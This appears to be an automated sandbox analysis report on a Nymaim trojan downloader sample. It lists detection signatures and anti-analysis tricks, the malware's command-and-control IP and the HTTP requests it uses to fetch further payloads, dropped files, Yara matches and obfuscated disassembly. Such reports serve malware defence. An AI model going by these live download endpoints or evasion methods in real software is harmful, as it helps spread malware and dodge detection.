Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565422
MD5: f7de1701682b8875c140e8d55b51b2d6
SHA1: 42afc2d0566630d75efbada19b24fa42464c72c2
SHA256: 60deca977327bb594df9bcbbb81215761b4f84ce48c0e3243531e86e9831dca0
Tags: exe, user-Bitsight
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection

Source: 0.2.file.exe.4a20e67.1.raw.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe ReversingLabs: Detection: 75%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_004035D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A23837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 0_2_04A23837
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417727 FindFirstFileExW, 0_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007EA9 FindFirstFileExW, 0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A3798E FindFirstFileExW, 0_2_04A3798E

Networking

Source: Malware configuration extractor IPs: 185.156.72.65
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Nov 2024 18:50:34 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Nov 2024 18:50:36 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-stream
Source: Joe Sandbox View IP Address: 185.156.72.65 185.156.72.65
Source: Joe Sandbox View ASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401970
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947623162.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/downloadG
Source: file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/downloadQ
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/key
Source: file.exe, 00000000.00000003.1585127269.0000000005337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download65/files/download-e433ee860fe502924bLMEM
Source: file.exe, 00000000.00000002.1947623162.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/downloadN
Source: file.exe, 00000000.00000002.1949998784.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947623162.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/soft/download
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.1644919692.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643886239.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641899289.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1641931393.0000000005309000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642947571.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1642841857.0000000005456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643946273.0000000005496000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643734355.00000000054D9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr String found in binary or memory: https://iplogger.org/1Pz8p7

E-Banking Fraud

Source: Yara match File source: 0.2.file.exe.4a20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.4a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

System Summary

Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403D40 0_2_00403D40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EE0 0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404F70 0_2_00404F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410940 0_2_00410940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A346 0_2_0041A346
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EBC7 0_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415E59 0_2_00415E59
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B6D0 0_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EF09 0_2_0040EF09
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041572E 0_2_0041572E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E184 0_2_1000E184
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_100102A0 0_2_100102A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 0_2_005E4832
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005EE957 0_2_005EE957
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004739CC 0_2_004739CC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004A31D9 0_2_004A31D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004BA9F0 0_2_004BA9F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005EB19F 0_2_005EB19F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005DB185 0_2_005DB185
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004CAA2A 0_2_004CAA2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005DDAAB 0_2_005DDAAB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00503B78 0_2_00503B78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D8BFE 0_2_005D8BFE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D7397 0_2_005D7397
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E7CB0 0_2_005E7CB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E2D44 0_2_005E2D44
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005DF577 0_2_005DF577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00544756 0_2_00544756
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E97EC 0_2_005E97EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00473F82 0_2_00473F82
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0067A866 0_2_0067A866
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0066B4C9 0_2_0066B4C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFCAE 0_2_006FFCAE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A251D7 0_2_04A251D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2EE2E 0_2_04A2EE2E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A23FA7 0_2_04A23FA7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A35995 0_2_04A35995
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2B937 0_2_04A2B937
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2F170 0_2_04A2F170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A30BA7 0_2_04A30BA7
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04A2AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A7A0 appears 35 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644
Source: file.exe, 00000000.00000003.1664905418.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.1664678591.0000000005419000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000000.00000003.1665195606.000000000541A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9946797040870489
Source: file.exe Static PE information: Section: egpglfrh ZLIB complexity 0.9921220677067892
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04948464 CreateToolhelp32Snapshot,Module32First, 0_2_04948464
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7312
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42
Source: C:\Users\user\Desktop\file.exe Command line argument: nosub 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe
Source: file.exe Static file information: File size 1998848 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of egpglfrh is bigger than: 0x100000 < 0x1a5a00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egpglfrh:EW;zosqaizp:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1ea223 should be: 0x1ef001
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: egpglfrh
Source: file.exe Static PE information: section name: zosqaizp
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00475869 push ss; retf 0_2_0047586A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ecx 0_2_005E483F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ecx 0_2_005E4893
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], edi 0_2_005E48A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], edx 0_2_005E48AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], edi 0_2_005E48BE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 3CF76B9Ch; mov dword ptr [esp], esi 0_2_005E4973
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ebp 0_2_005E49AB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], ecx 0_2_005E4AF1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 5F4D52D7h 0_2_005E4BB2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 56102779h; mov dword ptr [esp], edx 0_2_005E4BF6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 596F2651h 0_2_005E4C4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], edx 0_2_005E4C9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 4C696F00h; mov dword ptr [esp], edx 0_2_005E4CA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 49912876h; mov dword ptr [esp], ecx 0_2_005E4D3B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], 7C970B3Eh 0_2_005E4DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 59302537h; mov dword ptr [esp], ecx 0_2_005E4E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], 068C6F66h 0_2_005E4E45
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], esi 0_2_005E4E80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], ebp 0_2_005E4EBB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push esi; mov dword ptr [esp], ebx 0_2_005E4EC2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 034D7211h; mov dword ptr [esp], edx 0_2_005E4EF2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], edx 0_2_005E4F5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 4B32AC45h; mov dword ptr [esp], ecx 0_2_005E4F67
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], 7FEFB363h 0_2_005E4F81
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 65535FD9h; mov dword ptr [esp], ebx 0_2_005E4FD6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 24A76596h; mov dword ptr [esp], eax 0_2_005E500B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 6065C109h 0_2_005E500F
Source: file.exe Static PE information: section name: entropy: 7.939044986237492
Source: file.exe Static PE information: section name: egpglfrh entropy: 7.949780643963927
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
